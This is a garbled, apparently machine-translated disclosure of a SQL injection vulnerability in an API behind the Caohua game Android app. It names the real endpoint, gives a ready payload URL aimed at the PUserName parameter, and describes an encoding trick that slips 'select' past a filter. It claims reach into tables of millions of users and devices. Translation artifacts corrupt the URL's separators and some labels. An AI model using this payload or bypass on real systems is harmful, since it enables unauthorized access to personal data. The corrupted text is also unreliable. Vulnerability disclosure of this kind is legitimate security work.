漏洞标题 草花游戏官方APP存在SQL注入(涉及700W+用户数据/800W+设备信息) 相关厂商 caohua.com 漏洞作者 路人甲 提交时间 2016-05-05 09:21 公开时间 201…
漏洞标题
草花游戏官方APP存在SQL注入(涉及700W +用户数据/800W +设备信息)
相关制造商
Caohua.com
漏洞作者
过路人
提交时间
2016-05-05 09: 21
公共时间
2016-06-19 11: 40
漏洞类型
SQL注入漏洞
危险等级
高
自我评估等级
20
漏洞状态
制造商已确认
标签标签
SQL注入
漏洞详细信息
目标:草花游戏Android APP
测试发现在以下位置有SQL注入:(注入参数PUserName,错误注入)
http://switch.api.caohua.com/Api/CheckSalf.ashx?DeviceNo=B30FE6BC79CA96D418E41790D80A8E1B&Times=1462374589&UserID=639&AppID=133&PUserName=374587368&SourceID=576&Sign=C92A3457E748E4813A7B3AAD294595FA
有效载荷:
http://switch.api.caohua.com/Api/CheckSalf.ashx?DeviceNo=B30FE6BC79CA96D418E41790D80A8E1B&Times=1462374589&UserID=639&AppID=133&PUserName=374587368%27%20AND%203750=CONVERT%28INT,user%29%20 - %20%20-&安培;的SourceID=576安培;符号=C92A3457E748E4813A7B3AAD294595FA
由于选择被过滤,因此可以绕过编码
选择 - >%u0073elect
漏洞证明:
1,当前数据库用户

2,所有数据库

3,用户表,涉及700W +用户数据/800W +设备信息,具体不深〜

修理计划:
请多指教〜
版权声明:请注明出处。居民A @乌云